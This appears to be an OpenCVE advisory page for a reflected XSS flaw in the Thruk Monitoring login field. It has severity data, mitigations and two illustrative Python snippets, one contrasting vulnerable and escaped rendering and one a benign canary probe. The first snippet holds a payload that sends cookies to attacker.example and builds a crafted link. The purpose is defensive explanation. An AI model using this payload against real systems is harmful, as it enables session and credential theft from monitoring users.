Description
In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface.
Published: 2026-05-08
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A reflected cross-site scripting flaw exists in the login field of the Thruk Monitoring login form. Input submitted in that field is echoed back in the response without proper neutralisation, so an unauthenticated remote attacker who gets a user of the monitoring interface to open a crafted link or submit a crafted form can run arbitrary JavaScript in that user's browser, in the origin of the Thruk instance. Because the injection point is the login page, the most direct outcomes are credential theft (for example an injected fake login prompt), theft of any session cookie not protected by the HttpOnly flag, and defacement or manipulation of what the user sees in the interface.
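The mechanism described above, as an added illustration of the bug class (CWE-79) rather than code from Thruk or from this page: a login form that echoes the submitted login name raw into an attribute, beside the same form with the value HTML-encoded. Thruk itself is a Perl application; the form markup, the action path, the parameter name "login" and the payload below are assumptions chosen to show the mechanism, not details from the CVE record.

```python
"""Reflected XSS in a login form: the vulnerable rendering beside its hardened form.

Added illustration of the bug class behind CVE-2022-23961 (CWE-79). This is not
Thruk's code; the form markup, action path, parameter name "login" and payload
are assumptions used only to demonstrate the mechanism.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Hypothetical attacker input: the leading '">' closes the value attribute and the
# input tag, so the rest is parsed as markup instead of as an attribute value.
PAYLOAD = '"><script>location="https://attacker.example/?c="+document.cookie</script>'

_FORM_OPEN = '<form method="post" action="/thruk/cgi-bin/login.cgi">'
_FORM_CLOSE = '<input name="password" type="password"></form>'


def render_login_vulnerable(login: str) -> str:
    """Echo the submitted login name into the form without neutralisation."""
    return f'{_FORM_OPEN}<input name="login" value="{login}">{_FORM_CLOSE}'


def render_login_fixed(login: str) -> str:
    """Same form; the value is HTML-encoded for the attribute context it lands in.

    html.escape(quote=True) turns '"', '<', '>' and '&' into entities, so the
    browser keeps the whole string inside the attribute.
    """
    return f'{_FORM_OPEN}<input name="login" value="{html.escape(login, quote=True)}">{_FORM_CLOSE}'


def crafted_url(login_url: str, login: str) -> str:
    """The attack vector: a victim must open a URL (or submit a form) carrying the payload."""
    return login_url + "?" + urlencode({"login": login})


class _TagCounter(HTMLParser):
    """Count start tags the way a tolerant HTML parser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: dict = {}

    def handle_starttag(self, tag, attrs):
        self.tags[tag] = self.tags.get(tag, 0) + 1


def count_tags(doc: str) -> dict:
    """Parse doc and return {tag: count}; a 'script' entry means the payload became code."""
    parser = _TagCounter()
    parser.feed(doc)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    for name, render in (("vulnerable", render_login_vulnerable), ("fixed", render_login_fixed)):
        doc = render(PAYLOAD)
        print(f"{name}: script tags = {count_tags(doc).get('script', 0)}")
        print("  ", doc)
    print("crafted link:", crafted_url("https://mon.example/thruk/cgi-bin/login.cgi", PAYLOAD))
```

The parser step matters more than string matching: it shows that in the vulnerable rendering the browser sees a real script element, while in the fixed rendering the whole payload stays inside the attribute and the form keeps exactly its two inputs. Encoding must match the context (attribute here); the same fix does not cover a value reflected inside a script block or a URL.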

Affected Systems

All Thruk Monitoring releases through version 2.46.3 are affected. The CVE record (vendor listed as Herolab) gives no platform- or configuration-specific conditions, so every installation running one of those releases should be treated as exposing the vulnerable login page.

Risk and Exploitability

The flaw can be reached without authentication; the attacker only needs to be able to construct a request to the login page, so the attack vector is remote over HTTP or HTTPS (CVSS vector AV:N/AC:L/PR:N). Exploitation does require user interaction (UI:R): a user of the monitoring interface must open a crafted link or submit a crafted form, after which the payload is reflected and executes in that user's browser. The scope is rated as changed (S:C) because the impact lands in the user's browser rather than in the vulnerable Thruk component itself. The CVSS 3.1 base score of 6.1 indicates medium severity, with limited confidentiality and integrity impact and no availability impact (C:L/I:L/A:N). The SSVC assessment records a public proof of concept (Exploitation: poc) but rates the flaw as not automatable. The EPSS score of 0.00059 (reported as < 1%) shows a very low but non-zero probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog, so widespread exploitation is not documented.

Generated by OpenCVE AI on May 8, 2026 at 20:03 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Thruk Monitoring to a release later than 2.46.3 once the vendor publishes one that addresses the login form. No fix had been announced when this page was generated, so check the Thruk release notes and confirm the fix after upgrading (for example by verifying that a double quote or angle bracket entered in the login field is returned HTML-encoded).
  • If an update cannot be applied immediately, limit access to the monitoring interface to trusted networks or require additional authentication (e.g., VPN or IP allowlisting) so that only authorised users can reach the login form. This reduces who can be targeted but does not remove the flaw: the reflected payload still fires when an allowed user opens a crafted link from inside the trusted network.
  • Deploy a web application firewall or similar request filtering that blocks script payloads in the login parameter before they reach the application, treating it as defence in depth rather than a fix, since encoding-based filter bypasses are common for reflected XSS. A Content-Security-Policy that disallows inline scripts on the login page further limits what an injected payload can do.
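A verification aid for the actions above, added here and not part of Thruk or of OpenCVE: it sends a benign canary (a broken-out attribute plus a made-up tag name, no script) in the login field, classifies how the response echoes it, and performs a coarse check of the Content-Security-Policy header. The login URL, the parameter name "login" and the use of a GET request are assumptions; the real form may be submitted by POST, in which case send the canary that way. Only probe systems you are authorised to test.

```python
"""Check whether a Thruk login page reflects the login field without HTML encoding.

Added verification aid for CVE-2022-23961; not part of Thruk or OpenCVE. The
login URL, the parameter name "login" and the GET request are assumptions.
"""
from typing import Optional, Tuple
import urllib.parse
import urllib.request

CANARY_TAG = "zz-canary"
# Benign probe: breaks out of a double-quoted attribute and opens a harmless tag.
CANARY = f'probe"><{CANARY_TAG}>'


def classify_reflection(body: str) -> str:
    """Return 'unencoded', 'encoded' or 'absent' depending on how body echoes the canary."""
    if f"<{CANARY_TAG}>" in body:
        return "unencoded"   # the '"><' survived: the attribute context was broken out of
    if CANARY_TAG in body:
        return "encoded"     # text came back but '<' and '"' were entity-encoded or stripped
    return "absent"          # the field is not reflected on this page at all


def csp_restricts_inline_scripts(csp: Optional[str]) -> bool:
    """Coarse check of a Content-Security-Policy header value.

    True when script-src (or default-src as fallback) is present without
    'unsafe-inline'. This is a mitigation check, not proof the XSS is fixed:
    a policy can still be loose in other ways (permissive hosts, nonces
    reachable from the injection point).
    """
    if not csp:
        return False
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    return sources is not None and "'unsafe-inline'" not in sources


def probe(login_url: str, timeout: float = 10.0) -> Tuple[str, bool]:
    """Fetch login_url with the canary in the login parameter (network; not run offline)."""
    url = login_url + "?" + urllib.parse.urlencode({"login": CANARY})
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
        csp = resp.headers.get("Content-Security-Policy")
    return classify_reflection(body), csp_restricts_inline_scripts(csp)


# Constructed sample responses standing in for the three possible outcomes.
SAMPLE_VULNERABLE = f'<input name="login" value="probe"><{CANARY_TAG}>">'
SAMPLE_FIXED = f'<input name="login" value="probe&quot;&gt;&lt;{CANARY_TAG}&gt;">'
SAMPLE_NO_ECHO = '<input name="login" value="">'

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))   # e.g. https://mon.example/thruk/cgi-bin/login.cgi
    else:
        for label, body in (("vulnerable", SAMPLE_VULNERABLE),
                            ("fixed", SAMPLE_FIXED),
                            ("no echo", SAMPLE_NO_ECHO)):
            print(f"{label}: {classify_reflection(body)}")
```

Run it with the login URL as the only argument to probe a live instance; without arguments it classifies the three constructed samples. An "unencoded" result after an upgrade means the fix did not land on the page you tested; an "encoded" result from a WAF-protected instance says nothing about the application itself, so repeat the check from a path that bypasses the filter if you can.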


Advisories

No advisories yet.

History

(Columns: Type, Values Removed, Values Added. The Values Removed column is empty in every entry below.)

Wed, 13 May 2026 11:00:00 +0000

Type: First Time appeared
  Values Added: Herolab; Herolab thruk Monitoring
Type: Vendors & Products
  Values Added: Herolab; Herolab thruk Monitoring

Fri, 08 May 2026 20:30:00 +0000

Type: Title
  Values Added: Reflected XSS in Thruk Monitoring Login Form

Fri, 08 May 2026 14:15:00 +0000

Type: Metrics
  Values Added:
    cvssV3_1: {'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}
    ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 08 May 2026 07:15:00 +0000

Type: Title
  Values Added: Reflected XSS in Thruk Monitoring Login Form
Type: Weaknesses
  Values Added: CWE-79

Fri, 08 May 2026 05:00:00 +0000

Type: Description
  Values Added: In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface.
Type: References
  Values Added: (empty)

MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-08T13:49:44.094Z

Reserved: 2022-01-26T00:00:00.000Z

Link: CVE-2022-23961

Vulnrichment

Updated: 2026-05-08T13:49:40.735Z

NVD

Status : Awaiting Analysis

Published: 2026-05-08T05:16:08.700

Modified: 2026-05-08T16:08:15.570

Link: CVE-2022-23961

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-13T10:51:48Z

Weaknesses